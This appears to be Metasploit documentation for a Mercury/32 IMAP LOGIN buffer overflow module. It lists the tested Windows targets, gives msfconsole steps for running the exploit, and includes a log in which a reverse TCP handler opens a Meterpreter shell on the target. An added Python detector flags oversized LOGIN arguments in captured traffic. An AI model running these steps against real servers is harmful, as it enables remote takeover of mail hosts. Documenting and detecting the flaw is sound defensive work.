Mercury/32 <= 4.01b contains a stack-based buffer overflow in the IMAPD LOGIN verb. Sending a specially crafted IMAP LOGIN command allows remote code execution.

Vulnerable Application

This module exploits a stack buffer overflow in the Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted LOGIN command, a stack buffer is overflowed and code execution is possible. This vulnerability was discovered by mu-b (mu-b at digit-labs.org).

This module has been tested successfully on:

  • Mercury/32 v4.01a on Windows XP SP3 (x86)
  • Mercury/32 v4.01a on Windows 7 SP1 (x86)
  • Mercury/32 v4.01a on Windows Server 2003 Standard Edition SP1 (x86)
  • Mercury/32 v4.01b on Windows 7 SP1 (x86)
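As an added defensive example (not code from this module, Metasploit or Mercury/32), the following Python inspects captured IMAP command lines and reports LOGIN commands whose username or password argument is far longer than any mail client would legitimately send, which is the condition an overflow of the LOGIN handler depends on. It handles quoted strings and `{N}` literal announcements as well as bare atoms. The 256-byte threshold, the function names and the sample lines are assumptions constructed for this example.

```python
"""Flag IMAP LOGIN commands carrying abnormally long arguments.

Added example, not part of the Metasploit module or of Mercury/32: a small
tokenizer for tagged IMAP commands plus a check that reports LOGIN commands
whose arguments exceed a length threshold. Threshold and samples are constructed.
"""
import re
from typing import List, Optional, Tuple

# Constructed threshold: RFC 3501 does not bound LOGIN arguments, but real
# clients send credentials that are orders of magnitude shorter than this.
MAX_ARG_LEN = 256

# A tagged IMAP command line: <tag> <verb> [<arguments>].
_CMD_RE = re.compile(
    r'^(?P<tag>[^\s(){%*"\\\]]+)\s+(?P<verb>[A-Za-z]+)(?:\s+(?P<rest>.*))?$'
)


def tokenize_args(rest: str) -> List[str]:
    """Split the argument part into atoms, quoted strings and literal announcements."""
    tokens: List[str] = []
    i, n = 0, len(rest)
    while i < n:
        if rest[i].isspace():
            i += 1
        elif rest[i] == '"':
            # Quoted string; backslash escapes the next character.
            j, buf = i + 1, []
            while j < n and rest[j] != '"':
                if rest[j] == '\\' and j + 1 < n:
                    j += 1
                buf.append(rest[j])
                j += 1
            tokens.append(''.join(buf))
            i = j + 1
        elif rest[i] == '{':
            # Literal announcement {N} or {N+}: the N octets follow on the
            # next line, so keep the announced size rather than the text.
            m = re.match(r'\{(\d+)\+?\}', rest[i:])
            if m:
                tokens.append('{' + m.group(1) + '}')
                i += m.end()
            else:
                tokens.append(rest[i:])
                break
        else:
            j = i
            while j < n and not rest[j].isspace():
                j += 1
            tokens.append(rest[i:j])
            i = j
    return tokens


def arg_length(token: str) -> int:
    """Length of an argument; for a literal announcement, the announced size."""
    m = re.fullmatch(r'\{(\d+)\}', token)
    return int(m.group(1)) if m else len(token)


def inspect_login(line: str, max_len: int = MAX_ARG_LEN) -> Optional[Tuple[str, int]]:
    """Return (tag, longest argument length) for an oversized LOGIN, else None."""
    m = _CMD_RE.match(line.rstrip('\r\n'))
    if not m or m.group('verb').upper() != 'LOGIN':
        return None
    args = tokenize_args(m.group('rest') or '')
    if not args:
        return None
    longest = max(arg_length(a) for a in args)
    return (m.group('tag'), longest) if longest > max_len else None


def scan(lines: List[str]) -> List[Tuple[int, Tuple[str, int]]]:
    """Return (line number, finding) for every oversized LOGIN in a capture."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        result = inspect_login(line)
        if result:
            hits.append((lineno, result))
    return hits


# Constructed sample traffic: two benign commands, one oversized literal
# announcement and one oversized bare-atom username.
SAMPLE = [
    'a001 CAPABILITY',
    'a002 LOGIN alice "s3cret pass"',
    'a003 LOGIN {1500}',
    'a004 LOGIN ' + 'A' * 2000 + ' password',
]

if __name__ == '__main__':
    for lineno, (tag, length) in scan(SAMPLE):
        print(f'line {lineno}: tag {tag} LOGIN argument of {length} bytes exceeds {MAX_ARG_LEN}')
```

Run against a capture of the IMAP session (one command line per entry) to surface LOGIN commands that no legitimate client would generate; the literal path matters because a long argument can be announced with `{N}` instead of appearing on the command line itself.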

Verification steps

  1. Install the vulnerable Mercury/32 application
  2. Start msfconsole
  3. Do: use exploit/windows/imap/mercury_login
  4. Do: set RHOST IP
  5. Do: exploit
  6. You should get a shell.

Scenarios

Mercury/32 v4.01a on Windows 7 SP1 x86

msf > use exploit/windows/imap/mercury_login1
msf exploit(windows/imap/mercury_login1) > set rhost 192.168.46.144
rhost => 192.168.46.144
msf exploit(windows/imap/mercury_login1) > exploit

[*] Started reverse TCP handler on 192.168.46.1:4444
[*] 192.168.46.144:143 - Sending payload (8931 bytes) ...
[*] Sending stage (179779 bytes) to 192.168.46.144
[*] Meterpreter session 1 opened (192.168.46.1:4444 -> 192.168.46.144:49219) at 2018-10-27 20:43:14 +0200

meterpreter >
Computer        : WIN-DQ8ELRSOJAO
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows